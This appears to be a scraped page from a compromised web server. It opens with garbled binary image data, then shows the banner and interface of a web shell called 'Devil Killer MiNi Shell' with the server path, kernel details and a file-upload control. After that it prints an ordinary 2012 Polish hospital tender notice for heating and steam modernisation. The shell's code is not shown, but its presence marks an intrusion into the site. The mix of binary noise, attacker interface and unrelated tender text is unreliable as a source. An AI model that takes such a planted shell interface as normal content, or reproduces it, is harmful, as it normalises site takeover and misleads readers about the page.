JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120315/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120315/60209-N-2012.html

<p class="kh_header"><b>Poznań: roboty budowlane polegające na zaprojektowaniu i wykonaniu modernizacji układu grzewczego i wytwarzania pary  oraz eksploatacja systemu dla potrzeb Szpitala</b><br>
<b>Numer ogłoszenia: 60209 - 2012; data zamieszczenia: 15.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ginekologiczno-Położniczy Szpital Kliniczny Uniwersytetu Medycznego im. Karola Marcinkowskiego w Poznaniu , ul. Polna 33, 60-535 Poznań, woj. wielkopolskie, tel. 061 8419294, faks 061 8419620.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> roboty budowlane polegające na zaprojektowaniu i wykonaniu modernizacji układu grzewczego i wytwarzania pary  oraz eksploatacja systemu dla potrzeb Szpitala.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	Przedmiotem zamówienia są roboty budowlane polegające na  zaprojektowaniu i wykonaniu modernizacji układu grzewczego i wytwarzania pary oraz eksploatacja systemu dla potrzeb Szpitala
2)	Zakres  robót obejmuje:
a.	opracowanie dokumentacji projektowej i wykonanie robót mających na celu zmianę czynnika grzewczego obecnie wykorzystywanego przez szpital tj. rezygnację z zasilania parą wysokoprężną dostarczaną obecnie z kotłowni przy ul. Rokietnickiej w Poznaniu i zapewnienie podstawowego zasilania urządzeń energetycznych szpitala wodą z miejskiej sieci cieplnej;
b.	zapewnienie pary na potrzeby technologiczne szpitala w oparciu o elektryczną  wytwornicę pary:
c.	zapewnie obsługi eksploatacyjnej systemu grzewczego przez okres 6 lat od dnia wykonania modernizacji układu grzewczego.
3)	Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 i nr 2 do specyfikacji: Opis przedmiotu zamówienia, Program Funkcjonalno Użytkowy.
4)	Wymogi  Zamawiającego  odnoszące  się  do  przedmiotu  zamówienia:
a.	zaprojektowanie i wykonanie robót zgodnie z dokumentacją przetargową, zaleceniami nadzoru inwestorskiego, obowiązującymi  normami,  warunkami  technicznymi  wykonania robót  oraz  współczesną  wiedzą  techniczną
b.	udzielenie gwarancji na oferowany przedmiot zamówienia na warunkach zgodnych z określonymi w Opisie przedmiotu zamówienia i wzorze Umowy  na okres minimum 72 miesięcy licząc od dnia podpisania Protokołu Odbioru
c.	stosowanie  materiałów  odpowiadających  wymogom  wyrobów  dopuszczonych   do  obrotu  i  stosowania  w  budownictwie  określonym  w  ustawie  o  wyrobach  budowlanych  wraz  z  aktami  wykonawczymi  w  związku  z  art.  10  ustawy  Prawo  budowlane  oraz  specyfikacji  technicznej  wykonania  i  odbioru  robót.

Termin  wykonania:  od dnia  zawarcia umowy do  dnia  15.09.2018r.  wg następującego harmonogramu:
Zaprojektowanie układu grzewczego i wytwarzania pary w terminie  30 dni od dnia zawarcia umowy oraz   
wykonanie modernizacji układu grzewczego i wytwarzania pary w  następujących terminach:
a.  zainstalowanie  i uruchomienie wytwornicy pary  do dnia  31.05. 2012r.
b.  wykonanie modernizacji układu grzewczego do  dnia 15.09.2012r.
c.  eksploatacja systemu grzewczego i wytwarzania pary od dnia   16.09.2012r.  do dnia  15.09.2018r.
Zapłata za zaprojektowanie i wykonanie modernizacji układu grzewczego i wytwarzania pary nastąpi w 72 równych ratach miesięcznych, przy czym faktura VAT zostanie wystawiona po odbiorze technicznym zmodernizowanego układu grzewczego i wytwarzania pary. Zapłata za eksploatację systemu dla potrzeb szpitala nastąpi w 72 równych ratach miesięcznych, przy czym pierwsza faktura VAT zostanie wystawiona po odbiorze technicznym zmodernizowanego układu grzewczego i wytwarzania pary..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.21.40-5, 45.33.10.00-6, 50.72.10.00-5, 71.32.12.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2018.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1)Zamawiający  wymaga  wniesienia  wadium w kwocie  20 000.00  zł  ( słownie: dwadzieścia tysięcy złotych).  
2)Wadium  wnosi  się  przed  upływem   terminu  składania  ofert.

Forma  wadium
1) Wadium  może  być  wniesione  w  jednej  lub  kilku  następujących  formach;
a)	pieniądzu;
b)	poręczeniach  bankowych  lub  poręczeniach  spółdzielczej  kasy  oszczędnościowo - kredytowej,  z  tym  że  poręczenie  kasy  jest  zawsze  poręczeniem  pieniężnym,
c)	gwarancjach  bankowych;
d)	gwarancjach  ubezpieczeniowych;
e)	poręczeniach  udzielanych  przez  podmioty, o  których  mowa  w  art.  6 b  ust. 5  pkt. 2 ustawy  z  dnia  
9  listopada  2000 r.  o  utworzeniu  Polskiej  Agencji  Rozwoju Przedsiębiorczości  ( Dz. U.  z  2007 r.  Nr  42,  poz. 275 ).
2)	Z treści gwarancji / poręczenia winno wynikać bezwarunkowe, na każde  pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach  określonych w art. 46  ust. 4a oraz ust. 5  ustawy.

Miejsce  i  sposób  wniesienia  wadium
1)	Wadium  wnoszone  w  pieniądzu  Wykonawca  wpłaca  przelewem  na  rachunek Zamawiającego  w  GBW  S.A.  I  Oddział  w  Poznaniu;  numer  rachunku  36 1610 1188 0002 7515 2000 0006.
2)	W  przypadku  wnoszenia  wadium  w  pozostałych  formach  (wymienionych  w  pkt. 10.2.1) lit. b), c), d), e)  należy  je  złożyć  w  oryginale  w  kasie  Zamawiającego  (pokój  nr  319  w  Budynku  wejście  D 1,  III piętro).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiająy uzna za spełnienie warunku złożone oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia  działalności  jest  krótszy - w  tym  okresie,  wykonał dwie roboty budowlane odpowiadające przedmiotowi zamówienia, polegające na zaprojektowaniu i modernizacji układu grzewczego i/lub układu wytwarzania pary i  wartości każdej  z  nich  nie  mniejszej  niż  700 000  zł brutto.
Każda z wykazanych robot  winna  być realizowana w ramach odrębnej umowy.

Wykonawca spełni warunek w sytuacji kiedy wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał/ świadczył dwie usługi polegające na obsłudze eksploatacyjnej instalacji układu grzewczego i/lub układu wytwarzania pary i wartości każdej z nich nie mniejszej niż 70 000 zł brutto.
Każda z wykazanych usług  winna  być realizowana w ramach odrębnej umowy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiająy uzna za spełnienie warunku złożone oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże, że dysponuje lub będzie dysponować  w szczególności osobami:
Kierownikiem budowy posiadającym uprawnienia budowlane do  kierowania robotami budowlanymi bez ograniczeń w specjalności: instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji w budownictwie ( Dz. U. Nr 83 poz. 578 z późn. zm.)  lub odpowiadającymi im ważnymi uprawnieniami budowlanymi, które zostały wydane na podstawie wcześniej obowiązujących przepisów
Projektantem posiadającym uprawnienia budowlane bez ograniczeń do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych  w budownictwie ( Dz. U. Nr 83 poz. 578 z późn. zm.)  lub odpowiadającymi im ważnymi uprawnieniami budowlanymi do projektowania, które zostały wydane na podstawie wcześniej obowiązujących przepisów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie warunku złożone oświadczenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli  Wykonawca, wykazując spełnianie warunku dotyczącego  wiedzy i doświadczenia oraz warunku dysponowania  osobami zdolnymi  do wykonania zamówienia polega na zasobach innych podmiotów na zasadach określonych w art. 26  ust. 2b ustawy - Prawo zamówień publicznych zobowiązany jest oprócz oświadczeń i dokumentów wymienionych w pkt. 8.1 specyfikacji dodatkowo udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi  do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu  zamówienia.

Dokumenty i oświadczenia, o których  mowa powyżej  muszą zostać złożone w formie oryginału  lub  kopii   poświadczonej  za zgodność z oryginałem przez Wykonawcę.  W przypadku wykonawców wspólnie ubiegających  się o  udzielenie zamówienia oraz w przypadku podmiotów, o których  mowa  w  §  1  ust.  2  i  3  Rozporządzenia  Prezesa  Rady  Ministrów  z  dnia  30  grudnia  2009r.  w  sprawie rodzajów  dokumentów,  jakich  może  żądać zamawiający  od  wykonawcy  oraz  form,  w  jakich  te  dokumenty  mogą  być  składane, kopie  dokumentów  dotyczących  odpowiednio  wykonawcy  lub  tych podmiotów  są  poświadczane  za zgodność z oryginałem  przez wykonawcę  lub  te  podmioty.
	
Dokumenty  sporządzone  w  języku  obcym  są  składane  wraz  z  tłumaczeniem  na  język  polski.
Wykonawca mający siedzibę  lub  miejsce  zamieszkania  poza  terytorium Rzeczypospolitej  Polskiej, zamiast dokumentów, wskazanych w pkt. 8.2 ppkt. 2)  składa dokument  lub  dokumenty  wystawione  w  kraju,  w  którym  ma  siedzibę  lub   miejsce zamieszkania, potwierdzające  odpowiednio,  że:
a)	nie otwarto  jego  likwidacji  ani  nie  ogłoszono   upadłości - wystawione  nie  wcześniej  niż  6  miesięcy  przed  upływem terminu  składania  ofert

Jeżeli w miejscu zamieszkania  osoby  lub  w  kraju,  w  którym  wykonawca  ma  siedzibę  lub  miejsce  zamieszkania, 
nie  wydaje  się  dokumentów, o których  mowa  powyżej, zastępuje  się  je dokumentem  zawierającym oświadczenie
złożone  przed  notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania  osoby  lub kraju, w którym wykonawca ma siedzibę lub miejsce
zamieszkania.


W przypadku  składania jednej oferty przez  dwa  lub więcej podmiotów ( wykonawców ubiegających się  wspólnie o  udzielenie  zamówienia  np. konsorcja ) oferta spełniać  musi  następujące wymagania:
a)	w odniesieniu do wymagań postawionych przez zamawiającego, każdy z wykonawców występujących wspólnie, oddzielnie musi udokumentować, że nie podlega  wykluczeniu na podstawie  art.  24  ust. 1 ustawy
c)	oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców występujących wspólnie
d)	wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o  udzielenie  zamówienia  albo  reprezentowania  w  postępowaniu  i  zawarcia  umowy  w  sprawie zamówienia publicznego (do oferty dołączyć odpowiednie pełnomocnictwo). 
e)	wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik pozostałych. 

Wykonawcy wspólnie ubiegający się  o zamówienie, których oferta zostanie uznana za  najkorzystniejszą, przed 
podpisaniem umowy o realizację zamówienia, są zobowiązani  przedstawić Zamawiającemu umowę konsorcjum
zawierającą  w swej treści minimum następujące postanowienia:
a)	określenie celu  gospodarczego,
b)	określenie, który z podmiotów jest upoważniony do występowania w imieniu pozostałych przy realizacji zamówienia,
c)	oznaczenie czasu trwania konsorcjum obejmującego okres realizacji przedmiotu zamówienia oraz gwarancji i rękojmi,
d) 	zakaz zmian w umowie bez zgody Zamawiającego.
Nie dopuszcza się składania umowy przedwstępnej konsorcjum lub umowy zawartej pod warunkiem zawieszającym.

Złożenie wymaganych dokumentów po upływie terminu składania ofert jest możliwe jedynie w trybie  art.  26  ust. 3  ustawy - Prawo  zamówień publicznych. W sytuacji,  kiedy  Wykonawca  nie  złoży wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których  mowa  w  art.  25  ust. 1  ustawy  lub  nie  złoży pełnomocnictwa  albo złoży wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa  w  art.  25  ust. 1  ustawy, zawierające błędy lub złoży wadliwe pełnomocnictwo, Zamawiający wezwie do ich złożenia w wyznaczonym terminie (za wyjątkiem sytuacji, kiedy mimo ich złożenia oferta Wykonawcy podlegałaby odrzuceniu lub konieczne  byłoby unieważnienie postępowania).
Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu, nie później niż w dniu, w którym upłynął termin składania ofert.

Opis  sposobu  przygotowania  oferty
Wymagania  ogólne:
1)	Wykonawca  może  złożyć tylko  jedną  kompletną  ofertę.
2)	Oferta  musi  być  złożona  w  formie  pisemnej,  zgodnie  z  wymaganiami  opisanymi  w   niniejszej  specyfikacji.
3)	Oferta  winna  być  sporządzona  w  języku  polskim,  na  maszynie  do  pisania,  komputerze lub  inną  trwałą,  czytelną  techniką.  Złożone  materiały  powinny  być  spięte,  wszystkie  strony  oferty  zawierające  jakąkolwiek  treść  winny  być  ponumerowane,  podpisane  przez  upoważnionego  przedstawiciela  Wykonawcy  i  opatrzone  pieczątką.  
Strony  puste  nie  wymagają  numeracji,  podpisów  i  pieczątek.  Ewentualne  poprawki  w  tekście oferty  muszą  być  naniesione  w  czytelny  sposób,  parafowane  i  datowane  własnoręcznie  przez  osobę  podpisującą  ofertę.
4)	Dokumenty sporządzone w języku obcym należy złożyć  wraz  z  tłumaczeniem  na  język  polski  poświadczonym  przez  Wykonawcę.

Zawartość  oferty  i  sposób  jej  przedstawienia
1)	Oferta - wypełniony formularz oferty,  załącznik  nr  3  do  specyfikacji.
2)	Załączniki  do  oferty:
a)	parafowany  przez  Wykonawcę  wzór  umowy;  załącznik  nr  10  do  specyfikacji,
b)	dokumenty  i  oświadczenia  wymagane   w  rozdz.  III,   pkt. 8  niniejszej  specyfikacji.


3)	Oferta  wraz  z  załącznikami  musi  być  podpisana  przez  osobę  upoważnioną  do  reprezentowania  Wykonawcy,  w  przypadku  przedsiębiorcy  zgodnie  z  zasadami  reprezentacji  wskazanymi  we  właściwym  rejestrze  lub  np.  ewidencji  działalności  gospodarczej.  Do  oferty  należy  dołączyć  dokument  lub  pełnomocnictwo,  z  którego  wynika  uprawnienie  osoby  (osób)  do  składania  oświadczeń  woli  i  reprezentowania  Wykonawcy,  jeżeli  prawo  to  nie  wynika  z  rejestru.  W  takiej  sytuacji  dokument  lub  pełnomocnictwo  muszą  być  integralną  częścią  oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Z uwzględnieniem zapisu art. 144 ust. 1 ustawy Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy oraz  określa warunki tych zmian poprzez wprowadzenie do zawartej umowy następujących aneksów;
a)	aneks cenowy dopuszczający zmianę ceny w przypadku zmiany stawki podatku VAT zgodnie z obowiązującymi przepisami, z tym  że cena  brutto może ulec zmianie tylko w stopniu wynikającym ze zmiany stawki podatkowej, zaś cena netto pozostaje bez zmian,
b)	aneks dopuszczający uzasadnioną zmianę w zakresie sposobu wykonania przedmiotu zamówienia proponowaną przez Zamawiającego lub Wykonawcę, jeżeli ta zmiana jest korzystna dla Zamawiającego,
c)	aneks dopuszczający zmianę umówionego terminu wykonania zamówienia w przypadku:
wystąpienia warunków atmosferycznych uniemożliwiających realizację przedmiotu zamówienia zgodnie z procesem technologicznym,
wstrzymania robót przez uprawnione organy, z przyczyn nie wynikających z winy Stron umowy,
W  celu  dokonania  zmian  zapisów  umowy  wnioskowanych  przez  Stronę,  zobowiązana  jest  ona  pisemnie  wystąpić  z  propozycją  zmiany  warunków  umowy  wraz z  ich  uzasadnieniem,  z  co najmniej dwutygodniowym wyprzedzeniem</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www. gpsk.am.poznan.pl/dzp<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Odbiór osobisty w siedzibie Zamawijącego przy ul.Polnej 33 w Poznaniu, Budynek E1, I piętro, pokój 104 lub za pośrednictwem poczty po uprzednio złożonym wniosku.</p>
